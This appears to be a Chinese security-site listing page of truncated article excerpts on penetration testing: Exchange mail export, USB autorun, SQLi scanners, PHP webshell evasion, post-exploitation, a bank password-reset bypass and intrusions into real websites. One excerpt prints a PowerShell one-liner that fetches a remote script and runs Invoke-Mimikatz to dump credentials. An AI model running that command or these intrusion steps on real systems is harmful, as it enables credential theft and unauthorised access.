0x00 前言在渗透测试中,如果我们获得了Exchange服务器的管理权限,下一步就需要对Exchange服务器的邮件进行搜索和导出,本文将要介绍常用的两种方法,开源4个powershell脚本,分享脚本编写细节。0x01 简介本文将要介绍以下内容:· 管理Exchange服务器上邮件的两种方法· 导出邮件的两种方法· 搜索邮件的两种方法注:本文介绍的方法均为powershell命令。0x02 管理Exchange服务器上邮件的两种方法1.先使用PSSession连接Exchange服务器,进而远程管理邮件使用PSSession连接Exchange服务器的命令:$User = &
发布时间:
2019-10-08 13:10 |
阅读:31330 | 评论:0 |
标签:
技术 渗透
*本文作者:GeekOnline,本文属 FreeBuf 原创奖励计划,未经许可禁止转载。
USB(Universal Serial Bus)原意是指通用串行总线,是一个外部总线标准,用于规范电脑与外部设备的连接和通讯,这套标准在1994年底由英特尔、康柏、IBM、Microsoft等多家公司联合提出,提出之后经过一个快速的发展成功替代串口和并口等标准,成为一个世界认可的统一标准,被当代的海量设备使用,而我们口中常说的USB其实是指采用USB接口标准的可移动存储介质,那么以下为了叙述方便我们便用USB或U盘指代采用USB接口标准的可移动存储介质来详细介绍常见的三种利用该类型设备的渗透手法。
一、autorun.inf自动播放
在早期的互联网发展中,计算机之间的数据交换受限于网络带宽,因此可移动存储介质
SQL注入(SQLi)利用不安全 Web App 和数据库驱动的类似软件,抽取或篡改数据(如用户账户记录),甚至在服务器上执行Shell指令。这是合法用户和攻击者提交的代码,没有经过验证和清晰所导致的结果。被攻击软件或许期待的是一个订单号,而黑客发过去的却是一条SQL语句,而这恶意代码片段被包含到接下来的数据库查询中,让服务器按黑客的指令吐出敏感数据或执行他/她期待的动作。据所掌握的信息可知,用户可租用喀秋莎扫描器专业版(Katyusha Scanner Pro)每月200美元租金;或者在自己的系统上安装一个,500美元。该软件使用免费渗透测试工具Anarchi扫描器对网站执行SQLi攻击。最重要的是,它能通过Telegram即时消息系统进行控制。 所以,基本上,用户可以在联网服务器上执行喀秋莎——无
6月28日,知情人士通报美国广播公司新闻网,称未查明身份的黑客最近入侵了至少一家美国核电厂,联邦政府已介入调查。核电厂名及厂址并未公布,但据第一家报道该事件的E&E新闻网称,但今年已有多家核电生产站点受到网络攻击影响。目前尚不清楚谁发起了攻击,也不知道该攻击是否与27号冲击多个国家和公司的全球性网络攻击有关。入侵被限制在该核电厂的商业相关方面。截至目前,关于该黑客攻击的源头尚无太多信息透露出来,攻击被命名为“核17”,但证据显示攻击并未严重到触发美国核管理委员会或国际原子能机构公共安全系统警报的程度。目前可用的信息表明,核安全并未面临直接风险。但网络安全专家称,既然系统已被黑客渗透,核安全面临风险“指日可待”。网络安全公司CYR3CON创始人保罗·沙卡莲称:“如果核电设施商业面被攻击,那实际上有可能是黑
首都人民在飘雪哆嗦的日子里
仍然坚挺地哼唱着南山南 以解心头之寒
然而 沙龙已然到大美江西 办沙龙啦!!
沙龙在哪儿
会议时间:2016年11月26日 13:30-19:30
会议地点:午夜烧货(九江八里湖北大道欧洲风情街)
承办单位:墨眉科技
协办单位:神舟测评/热璞科技
特别支持:唯品会安全应急响应中心
如何报名
出题背景:王松_Striker说,来江西站沙龙的人必须是CTF战神!小编有点不信,于是让他给出了个CTF,听说能解出来都可以跟他提个要求??
出题目的:邀请圈内白帽一战,虐王松_Striker一把!
题目内容:挑战CTF的同学复制—butian.360.cn/game/ctfindex进入页面开战!最终拿到flag的同学才有资格参与本次沙龙活动哦!
沙龙牛人议题
《
*本文原创作者:VillanCh,转载须注明来自FreeBuf.COM
这篇文章不是给 PHP 程序员看的,而是给渗透测试爱好者准备的,( ̄︶ ̄*))。
本文不是 PHP 教程,本文只针对 PHP 的各种奇淫技巧进行整理和证明,在进行渗透测试(WEB 安全)的学习中,经常需要涉及到 PHP 编程,或者 PHP 编写 Webshell 或者一句话木马,一般的 PHP 马经常被各种软件发现被杀。与此同时,网络经常流传一些免杀马(当然免杀一句话很有可能藏后门大家都是知道的),那么那些免杀是怎么做出来的?打开看,可能就是非常难看难以阅读的 PHP 代码(为了混淆各种杀软的侦察)。
当然,怎么样写出那种奇奇怪怪的东西呢?这就取决于你对 PHP 这门语言的了解程度:你是一个 PHP 开发者,通过 P
发布时间:
2016-11-18 22:50 |
阅读:118756 | 评论:0 |
标签:
新手科普 php 渗透
1.0前言
后渗透常见的信息收集思路
延伸:
渗透测试中的技巧
后渗透阶段的攻防对抗
linux入侵后续指南
mimikittenz:又一款Windows密码获取工具
1.1系统管理员密码
A.常用来获取windows密码的工具
1.mimikatz
2.wce
3.getpass
4.QuarksPwDump
5.reg-sam
6.pwdump7
7.procdump.exe +mimikatz
…….
B.免杀抓取密码的两种方式
1.powershell "IEX (New-Object Net.WebClient).DownloadString('http://is.gd/oeoFuI'); Invoke-Mimikatz -DumpCreds"tips:
前言
上次因为被灰鸽子骗了,所以全过程的思路分享并没有写出来。那么今天,我们来弥补掉这个遗憾。没错!灰鸽子再次沦陷。
踩点
首先灰鸽子有两个域名:
www.hgzvip.net ,域名注册人hkmangguo@vip.qq.com
www.huigezi.org,域名注册人hkmangguo@vip.qq.com
域名商PDR LTD. D/B/A PUBLICDOMA,曾经比中国万网还牛的国外知名域名商;想必客服质量特别高2333。
半年前,我们渗透的是www.huigezi.org,那么今天我们同样要渗透这个站点
两个域名从注册人来看,明显是同一家公司。我们在查看同IP站点的时候两个网站并不在同一台服务器。这个时候,我们也不知道是不是同一个服务器,我们先进行前期信息收集。在使用人肉及密码库对比的时候,顺
目前网络上已有的无线渗透的资料,综合来看偏重于操作,只要找到合适的无线网卡,运行aircrack按照操作步骤就可以做一些无线密码的破解等,但是本课程结合老师学习无线渗透的经验,详解无线渗透技术的原理、理论知识。理论结合实践,本课程前半部分是理论课程,后半部分介绍无线渗透测试的实践操作。在课程中首次详解每一个包的协议结构,尤其是无线的协议结构,绝大部分人是陌生的。本课程是无线局域网渗透测试的全面教程。课程目录:无线渗透无线网运行模式无线网硬件设备及基本概念无线技术概念Linux无线协议栈及配置命令RADIOTAP头部和802.11头部CONTROL REAMEMANAGEMENT FRAME 管理帧REASSOCIATION REQUEST FRAMEWEP加密、RC4算法WAP安全系统密钥交换、无线渗透实操AI
最近持续不断的针对性恶意email附件攻击,让我想起了今年1月份在都柏林举办的NCC会议上,笔者曾发表的一篇总结报告。这场演讲基于一次综合的渗透实验,故事始于笔者对一个老旧容易被忽视的DDE(动态数据交换)进行攻击利用,从一个web应用的Excel导出功能,到用户工作站系统代码。随后我们将看到NTLMv2理论,过渡到域凭证的分析,接着了解hashcat的小bug,以及获悉新脚本“catflap”相关的信息。从CSV到CMDDDE是一款来自微软的古老技术,它用于帮助应用程序之间的数据进行传输,是IPC(进程间通信)的一种形式。Web应用的安全风险的文章,我记得是由James Kettle进行首发的。这种技术貌似是在2014年前的,话说时间过得真快啊。这里有个小tips,如果某web应用里的有
发布时间:
2016-04-27 14:10 |
阅读:106961 | 评论:0 |
标签:
漏洞 系统安全 渗透
Burp不仅仅可以被用于Web应用程序测试。我常在移动端和胖客户端测试中使用Burp。如果应用使用了HTTP方法,那么Burp绝对会成为你最好的选择。我要记录在工作中对我有很大帮助的Burp技巧。目的之一是与大家一起分享这些技巧,另一个目的是把这些技巧记录下来(类似于菜单中的备忘录)。这部分中,我将讲述通过 Proxy > Option 配置的拦截和代理监听。这篇文章中的Burp Pro的版本为1.6.39,大部分项都适用于现状的Burp Free版本(1.6.32)。自从我开始使用Burp(v1.5)以来,大部分设置都没有改变过。你可以在这个地址下载Burp https://portswigger.net/burp/download.html。当我开始写这篇文章的时候真
宇宙的确很诡异,这对于阿尔伯特·爱因斯坦和想闯入加密量子体系的准黑客来说都是一个坏消息。八年前,物理学家们曾经反驳过一个荒诞的观点,那就是仅仅通过观察一个粒子就能够瞬间改变另一个远在天边的物体。然而,一个荷兰科学家在上周三已经证明了这种现象是可以真实存在的。在《自然》杂志上,研究者详细描述了一个实验,这个实验向我们展示了在代尔夫特科技大学校园内两个相隔1.3公里的电子之间存在的一种确定的、看不见的并且是瞬间的连接。这个研究的重要性在于,它使得在早期实验中量子理论预测的怪异连接是否存在的疑问得到了解答。爱因斯坦在1935年的一份科学报纸上发表了一篇著名的文章,他坚持认为他称作“作用于距离上的怪异现象”一定是错误的,粒子一定还存在我们没有发现的属性,这种属性能用来解释这种反直觉的行为。这种想法确实使我们对于世界认知
文|网络尖刀Storm
安全评估的第一步是最大程度地收集目标系统的信息,这同样也是渗透测试的关键性步骤。信息的收集和分析伴随着渗透测试的每一个步骤。
实现信息收集有很多种方法,例如:使用搜索引擎、扫描器或发送特殊构造的HTTP请求等,这些手段都可以使服务器端的应用程序返回一些错误信息或系统运行环境的信息,通过分析这些信息,可以为后期的渗透测试工作提供很大帮助。
以我个人经验来说,我认为越大的架构越容易出现安全问题 。
下面测试两款比较常用的又方便的信息收集工具 。
Wydoamin 来自猪猪侠的神器
* thorns_project (分布式异步队列系统)
* wydomain (目标系统信息收集组件)
* wyportmap (端口扫描+系统服务指纹识别)
* wyfingerprint
发布时间:
2015-10-30 08:00 |
阅读:156379 | 评论:0 |
标签:
安全 技术 渗透
安全服务工程师 招聘人数:1
工作地点:北京
岗位职责:
1、负责安全服务类项目的实施、支持与管理,包括:渗透测试、应急响应、安全评估等;
2、负责与客户进行现场沟通和交流,挖掘和引导用户需求,为客户提供合理的安全服务解决方案、技术建议书等;
3、负责对客户进行安全意识与技能培训;
4、负责项目实施及后期维护过程中与用户的沟通、反馈等工作。
岗位要求:
1、熟悉风险评估、应急响应、渗透测试、安全加固等安全服务;熟悉常见黑客攻防方法;
2、熟悉常见信息安全产品或工具,如防火墙、IDS/IPS、防病毒、漏洞检测工具等;
3、熟悉常用网络协议、Windows/Linux/Unix操作系统,并了解相关的安全漏洞、加固方法;
4、熟悉Oracle/mssql/mysql等数据库,并了解相关的的安全漏洞或入侵手段;
5、熟
发布时间:
2015-09-05 18:15 |
阅读:105094 | 评论:0 |
标签:
招聘 中新软件 渗透 黑客
简要描述:
银行啊,中国银行啊!!!
详细说明:
中国银行中银易商e.boc.cn
修改密码处验证缺陷可轻松绕过,看图:
填入一个已经存在的用户名,进行密码找回
将这里的false修改成true
轻松绕过
漏洞证明:
成功登录:
泄露用户手机号:(我刻意找了个尾号为888的土豪进行测试)
再来一个成功的效果图
发布时间:
2015-07-19 04:10 |
阅读:101214 | 评论:0 |
标签:
黑客 渗透
前段时间有个奇怪的培训机构过来我们学校要搞个什么网络安全比赛,问了绿盟的一个朋友,听都没听过有家这样的安全公司,于是我小小的调戏了一下,期间的故事是颠簸起伏,于是就有了这次YD的检测。本文只是讲解渗透思路和技巧,部分技术实现细节将略过,有兴趣可以自行搜索相关资料。非法入侵是违法行为,请勿以身试法。
0x00 踩点准备
先把他们公司的站点扔去查询,万网的虚拟主机,企业备案,然而建站时间差不多2年而已,至于网站上所说的什么九周年我就不知道是什么鬼了。企业备案查不到什么个人信息,社工可以暂时放一边,只能开始技术检测。
0x01 开始进攻
站点是使用ASP的,随便测试了下手注,发现并不成功,然后随便试了几个常见的后台路径,打开后台界面了,略高大上的后台。
加上login.asp就跳到了登陆界面,试了试弱口令还有万